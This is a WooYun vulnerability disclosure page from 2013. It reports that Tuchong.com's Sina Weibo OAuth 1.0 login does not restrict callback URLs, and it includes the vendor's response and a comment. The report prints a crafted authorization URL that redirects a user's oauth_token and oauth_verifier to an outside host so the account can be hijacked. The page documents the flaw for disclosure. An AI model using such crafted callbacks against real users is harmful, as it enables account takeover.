当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027320

漏洞标题:图虫网第三方认证缺陷导致可以劫持帐号

相关厂商:图虫网

漏洞作者: VIP

提交时间:2013-07-01 11:02

修复时间:2013-08-15 11:03

公开时间:2013-08-15 11:03

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-01: 细节已通知厂商并且等待厂商处理中
2013-07-01: 厂商已经确认,细节仅向厂商公开
2013-07-11: 细节向核心白帽子及相关领域专家公开
2013-07-21: 细节向普通白帽子公开
2013-07-31: 细节向实习白帽子公开
2013-08-15: 细节向公众公开

简要描述:

图虫网使用的新浪微博第三方登录Oauth版本为1.0,通过Oauth1.0的缺陷导致可以劫持用户的oauth_token和oauth_verifier,继而登录用户帐号。

详细说明:

图虫网使用的新浪微博第三方登录Oauth版本为1.0,Oauth1.0对回调URL没有限制,导致可以回调到攻击者的网站,获取用户的oauth_token和oauth_verifier,劫持用户帐号。
图虫网正常的授权链接是这样的:

http://api.t.sina.com.cn/oauth/authorize?oauth_token=94246086381d229991d4960d4f602ad1&oauth_callback=http%3A%2F%2Ftuchong.com%2Fbind%2F


授权后oauth_token和oauth_verifier会回调到http://tuchong.com/bind/
但是,由于图虫使用的是较老的Oauth1.0,对oauth_callback没有限制,所以攻击者可以构造一个这样的URL给用户。

http://api.t.sina.com.cn/oauth/authorize?oauth_token=d2437d0957de924e04cfa7f002665055&oauth_callback=http://wooyun.org


用户点击授权后,oauth_token和oauth_verifier将会被回调到攻击者的网站http://wooyun.org,攻击者获取了用户的oauth_token和oauth_verifier后,就可通过http://tuchong.com/bind/?oauth_token=xx&oauth_verifier=xxx的形式登录用户帐号了。

漏洞证明:

点击授权按钮后,oauth_token和oauth_verifier被回调到了http://wooyun.org

sq.jpg

修复方案:

目前主流网站均使用了更安全的Oauth2.0,请图虫网将登录接口升级到Oauth2.0。

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-07-01 16:34

厂商回复:

我的理解是,作者认为所有OAuth1.0a的网站都有这样的问题。
但问题是黑客如何让一个普通用户在授权过程中点击含有被篡改过callback的网址。
真正形成攻击,黑客至少还需要一个其他的漏洞诱导用户点击被篡改过callback的连接地址

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-22 16:05 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)

    厂商回复好亮,你会因为家里锁着门而不锁柜子么